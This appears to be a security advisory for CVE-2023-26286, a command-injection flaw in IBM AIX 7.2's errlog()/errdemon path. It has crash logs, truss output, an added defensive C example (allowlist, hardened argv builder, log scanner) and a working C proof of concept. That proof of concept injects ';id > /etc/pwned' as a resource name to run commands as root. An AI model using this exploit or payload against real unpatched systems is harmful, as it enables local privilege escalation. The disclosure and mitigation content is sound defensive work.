CVE-2023-26286
An OS command injection vulnerability exists in the errlog() syscall functionality of IBM Corporation AIX 7.2. A specially crafted syscall can lead to the execution of a privileged operation. An attacker can make a crafted errlog() call to trigger this vulnerability and execute arbitrary commands.
The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.
IBM Corporation AIX 7.2
AIX - http://us.ibm.com
5.5 - CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N
CWE-117 - Improper Output Neutralization for Logs
AIX is a series of proprietary Unix operating systems developed and sold by IBM for several of its computer platforms.
Research into the attack surface presented by the errlog() syscall has identified three potential areas of concern.
It should be noted that these events will likely be onboarded into the system operator's wider monitoring infrastructure. Being able to inject arbitrary events allows an attacker to actively mislead defenders as to the current operational state of the platform.
Certain combinations of values supplied in the err_rec structure via the error_id, resource_name and detail_data properties to the errlog() syscall can result in out-of-bounds memory access when the events are processed by the errdemon process.
```
$ errpt -a
…
LABEL: CORE_DUMP
IDENTIFIER: A924A5FC
Date/Time: Mon Mar 23 23:54:21 BST 2020
Sequence Number: 22952
Machine Id: 00CA1BFD4C00
Node Id: beehive
Class: S
Type: PERM
WPAR: Global
Resource Name: SYSPROC
Description
SOFTWARE PROGRAM ABNORMALLY TERMINATED
Probable Causes
SOFTWARE PROGRAM
User Causes
USER GENERATED SIGNAL
Recommended Actions
CORRECT THEN RETRY
Failure Causes
SOFTWARE PROGRAM
Recommended Actions
RERUN THE APPLICATION PROGRAM
IF PROBLEM PERSISTS THEN DO THE FOLLOWING
CONTACT APPROPRIATE SERVICE REPRESENTATIVE
Detail Data
SIGNAL NUMBER
11
USER’S PROCESS ID:
7929890
FILE SYSTEM SERIAL NUMBER
4
INODE NUMBER
0 4
CORE FILE NAME
/var/adm/ras/core
PROGRAM NAME
lfailaiocachelv
STACK EXECUTION DISABLED
0
COME FROM ADDRESS REGISTER
PROCESSOR ID
hw_fru_id: 0
hw_cpu_id: 0
ADDITIONAL INFORMATION
strlen 0
_doprnt 7574
vsnprintf 150
lvmt_entr 104
lvmt 124
main 784
__start 6C
Symptom Data
REPORTABLE
1
INTERNAL ERROR
1
SYMPTOM CODE
PIDS/5765E6200 LVLS/520 PCSS/SPI2 FLDS/lfailaioc SIG/11 FLDS/strlen VALU/0 FLDS/main
—————————————————————————
LABEL: LVM_CLV_FAIL_DONE
IDENTIFIER: 30097641
Date/Time: Tue Mar 24 00:06:35 BST 2020
Sequence Number: 22981
Machine Id: 00CA1BFD4C00
Node Id: beehive
Class: S
Type: INFO
WPAR: Global
Resource Name: M6UHAE3).JSJXRD$NONE
Description
AIO CACHE FAIL RECOVERY DONE
Recommended Actions
If asynchronous IO cache is marked as invalid then using chmp command disable the asynchronous mirroring for a volume group.
Synchronize all the logical volume copies.
Delete a old aio_cache type logical volume.
Create a new aio_cache type logical volume.
Setup an asynchronous mirroring using new aio_cache type logical volume.
Detail Data
AIO CACHE DEVICE MAJOR/MINOR
MIRROR POOL ID
VOLUME GROUP ID
```
Output from truss for the crash is as follows:
```
7929890: 42664157: kopen("/var/adm/ras/errlog", O_RDONLY) = 5
7929890: 42664157: lseek(5, 0, 0) = 0
7929890: 42664157: kread(5, " a e r r l o g r\0\0\0 ▒".., 32) = 32
7929890: 42664157: lseek(5, 0, 0) = 0
7929890: 42664157: _lockf(5, 1, 0) Err#9 EBADF
7929890: 42664157: lseek(5, 0, 0) = 0
7929890: 42664157: kread(5, " a e r r l o g r\0\0\0 ▒".., 32) = 32
7929890: 42664157: lseek(5, 281112, 0) = 281112
7929890: 42664157: kread(5, "\0\010 ▒", 4) = 4
7929890: 42664157: lseek(5, 276857, 0) = 276857
7929890: 42664157: kread(5, "\0\010 ▒", 4) = 4
7929890: 42664157: kread(5, "\f M ▒ 4\0\0 Y ▒ ^ y >1D".., 4255) = 4255
7929890: 42664157: lseek(5, 276853, 0) = 276853
7929890: 42664157: kread(5, "\0\010 ▒", 4) = 4
7929890: Received signal #11, SIGSEGV [default]
7929890: ** process killed **
```
The most critical vulnerability can be triggered using the example code below to generate an error with an ID of ERRID_CORRUPT_LOG and a resource_name of `;id > /etc/pwned`. The resource name is used by errdemon when it processes events that have been written to /dev/error.
As can be seen in the snippet below, taken from a truss-based recording of the errdemon process's activity, the supplied resource name value is used to construct the command passed into execve(). This results in it being executed as the root user:
```
execve("/usr/bin/sh", …);
argv: sh -c /usr/lib/physloc ;id > /etc/pwned
```
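To make the defect and its fix concrete, the following is an added example written for this page in portable C; it is neither the Talos proof of concept nor IBM's errdemon code. It assumes ERR_NAMESIZE is 16 bytes (the width of err_rec.resource_name), takes the /usr/lib/physloc command line from the truss excerpt above, and assumes that legitimate AIX resource names (SYSPROC, hdisk0, ent0 and the like) consist only of alphanumerics, '_', '-' and '.'. The first two functions contrast the vulnerable string-built command with an execv()-style argument vector gated by that allowlist; the last applies the same allowlist as a detection over a constructed errpt -a excerpt, one way to pick out injected events of the kind discussed earlier once they reach monitoring.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define ERR_NAMESIZE 16             /* assumed width of err_rec.resource_name */
#define PHYSLOC "/usr/lib/physloc"  /* command seen in the truss excerpt */

/* Allowlist check. Legitimate resource names are assumed to be short and made
 * of alphanumerics plus '_', '-' and '.'; shell metacharacters, whitespace and
 * control bytes are rejected. The field need not be NUL-terminated, so never
 * read past ERR_NAMESIZE. */
int resource_name_is_safe(const char *name)
{
    size_t i;
    for (i = 0; i < ERR_NAMESIZE && name[i] != '\0'; i++) {
        unsigned char c = (unsigned char)name[i];
        if (!(isalnum(c) || c == '_' || c == '-' || c == '.'))
            return 0;
    }
    return i > 0;   /* an empty name is not a valid resource either */
}

/* Vulnerable pattern from the truss output: the name is pasted into one string
 * that sh -c tokenises, so ";id > /etc/pwned" becomes a second command. */
int build_physloc_cmd_unsafe(const char *name, char *out, size_t outlen)
{
    int n = snprintf(out, outlen, "%s %s", PHYSLOC, name);
    return (n >= 0 && (size_t)n < outlen) ? 0 : -1;
}

/* Hardened pattern: validate, then hand the name to execv() as a single argv
 * element so no shell ever parses it. av must hold 3 pointers and namebuf
 * ERR_NAMESIZE + 1 bytes. Returns 0, or -1 if the name is rejected. */
int build_physloc_argv(const char *name, const char *av[3], char *namebuf)
{
    if (!resource_name_is_safe(name))
        return -1;
    strncpy(namebuf, name, ERR_NAMESIZE);   /* copy at most the field width */
    namebuf[ERR_NAMESIZE] = '\0';
    av[0] = PHYSLOC;
    av[1] = namebuf;
    av[2] = NULL;
    return 0;
}

/* Detection: scan errpt -a text for "Resource Name:" values that fail the
 * allowlist or overrun the field width. Returns the number of suspicious
 * entries and copies the first into first_bad (ERR_NAMESIZE + 1 bytes). */
int scan_errpt_for_suspicious_names(const char *errpt_text, char *first_bad)
{
    const char *key = "Resource Name:";
    const char *p = errpt_text;
    int bad = 0;

    first_bad[0] = '\0';
    while ((p = strstr(p, key)) != NULL) {
        char name[ERR_NAMESIZE + 1];
        size_t i = 0;

        p += strlen(key);
        while (*p == ' ' || *p == '\t')
            p++;
        while (*p != '\0' && *p != '\n' && i < ERR_NAMESIZE)
            name[i++] = *p++;
        name[i] = '\0';
        /* a value wider than the field is suspicious even if what fit looks clean */
        if ((*p != '\0' && *p != '\n') || !resource_name_is_safe(name)) {
            if (bad == 0)
                strcpy(first_bad, name);
            bad++;
        }
    }
    return bad;
}

/* Constructed errpt -a excerpt, not captured from a real system: two benign
 * names, the advisory's injection payload, and the garbled name that appears
 * in the advisory's own errpt output. */
static const char SAMPLE_ERRPT[] =
    "Resource Name:  SYSPROC\n"
    "---\n"
    "Resource Name:  hdisk0\n"
    "---\n"
    "Resource Name:  ;id > /etc/pwned\n"
    "---\n"
    "Resource Name:  M6UHAE3).JSJXRD$NONE\n";

int main(void)
{
    char cmd[128], first_bad[ERR_NAMESIZE + 1];
    int bad;

    build_physloc_cmd_unsafe(";id > /etc/pwned", cmd, sizeof cmd);
    printf("shell would receive: %s\n", cmd);
    bad = scan_errpt_for_suspicious_names(SAMPLE_ERRPT, first_bad);
    printf("suspicious resource names: %d (first: %s)\n", bad, first_bad);
    return 0;
}
```

The allowlist is deliberately stricter than "reject ';'": denying by character class also stops `$(...)`, backticks, redirection and whitespace, none of which belong in a device or subsystem name, and the width check catches values that would not have fit in the 16-byte field in the first place.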
The simplest exploitation path to gain command execution takes the following form:
```
#include <stdio.h>
#include <string.h>
#include <sys/err_rec.h>   /* struct err_rec, ERR_NAMESIZE */
#include <sys/errids.h>    /* ERRID_CORRUPT_LOG, errlog() */

int main(int argc, char **argv)
{
    struct err_rec mal_rec;

    if (argc != 2) {
        fprintf(stderr, "usage: %s resource_name\n", argv[0]);
        return 1;
    }
    /* Any registered error ID works, but the choice affects how errdemon processes the event. */
    mal_rec.error_id = ERRID_CORRUPT_LOG;
    /* The resource name is what errdemon later places on the /usr/lib/physloc command line. */
    strcpy(mal_rec.resource_name, argv[1]);
    /* Submit only the error ID and resource name; detail_data is not sent. */
    return errlog((void *) &mal_rec, sizeof(unsigned int) + ERR_NAMESIZE);
}
```
Once the event has been submitted with errlog(), it is exposed on /dev/error for processing. For example:
```
./logpop ";id > /etc/pwned"
```
This results in /etc/pwned being created with root privileges and populated with the output of the id command when the event is processed by errdemon.
2023-01-09 - Initial Vendor Contact
2023-01-16 - Vendor Disclosure
2023-04-13 - Vendor Patch Release
2023-04-24 - Public Release
Discovered by Tim Brown of Cisco Security Advisory EMEAR.